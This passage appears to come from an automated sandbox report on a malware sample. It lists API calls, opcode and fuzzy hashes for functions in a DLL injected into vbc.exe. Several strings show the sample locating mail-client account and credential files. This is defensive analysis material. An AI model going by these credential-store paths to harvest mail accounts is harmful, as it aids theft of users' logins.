                                                                                                                                                                                        • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                      • __freea.LIBCMT ref: 10008A11
                                                                                                                                                                                      • __freea.LIBCMT ref: 10008A36
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1414292761-0
                                                                                                                                                                                      • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                                                      • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                                                                                                      • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _strlen.LIBCMT ref: 10001607
                                                                                                                                                                                      • _strcat.LIBCMT ref: 1000161D
                                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                                                                                                      • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1922816806-0
                                                                                                                                                                                      • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                                                      • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                                                                                                                      • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?), ref: 10001038
                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3594823470-0
                                                                                                                                                                                      • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                                                                      • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                                                                                                                      • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                                                                      • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                                      • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                                                                      • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                                                                                                                      • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                                                                      • _free.LIBCMT ref: 10005B2D
                                                                                                                                                                                      • _free.LIBCMT ref: 10005B55
                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                                                                      • _abort.LIBCMT ref: 10005B74
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3160817290-0
                                                                                                                                                                                      • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                                                                      • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                                                                                                                      • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                                        • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                                                                        • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                                        • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                                        • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                                                                                        • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                                                                                        • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                                                      • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                      • API String ID: 4036392271-1520055953
                                                                                                                                                                                      • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                                      • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                                                                                      • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                      • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                                                      • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                                                      • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                                                                                        • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                                                                                      • _free.LIBCMT ref: 100071B8
                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 336800556-0
                                                                                                                                                                                      • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                                                      • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                                                                                                      • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                                                                                      • _free.LIBCMT ref: 10005BB4
                                                                                                                                                                                      • _free.LIBCMT ref: 10005BDB
                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                                                      • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                                      • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                                      • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrlen$lstrcat
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 493641738-0
                                                                                                                                                                                      • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                                      • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                                      • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _free.LIBCMT ref: 100091D0
                                                                                                                                                                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                      • _free.LIBCMT ref: 100091E2
                                                                                                                                                                                      • _free.LIBCMT ref: 100091F4
                                                                                                                                                                                      • _free.LIBCMT ref: 10009206
                                                                                                                                                                                      • _free.LIBCMT ref: 10009218
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                      • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                                      • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                                      • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _free.LIBCMT ref: 1000536F
                                                                                                                                                                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                      • _free.LIBCMT ref: 10005381
                                                                                                                                                                                      • _free.LIBCMT ref: 10005394
                                                                                                                                                                                      • _free.LIBCMT ref: 100053A5
                                                                                                                                                                                      • _free.LIBCMT ref: 100053B6
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                      • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                                                      • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                                                                                                      • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                                                      • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe,00000104), ref: 10004C1D
                                                                                                                                                                                      • _free.LIBCMT ref: 10004CE8
                                                                                                                                                                                      • _free.LIBCMT ref: 10004CF2
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$FileModuleName
                                                                                                                                                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                                      • API String ID: 2506810119-50795131
                                                                                                                                                                                      • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                                                      • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                                                                                                      • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                                                      • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                                                                                                      • __freea.LIBCMT ref: 100087D5
                                                                                                                                                                                        • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2652629310-0
                                                                                                                                                                                      • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                                                      • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                                                                                      • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                                                                                                      • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                                                                      • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                                                      • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
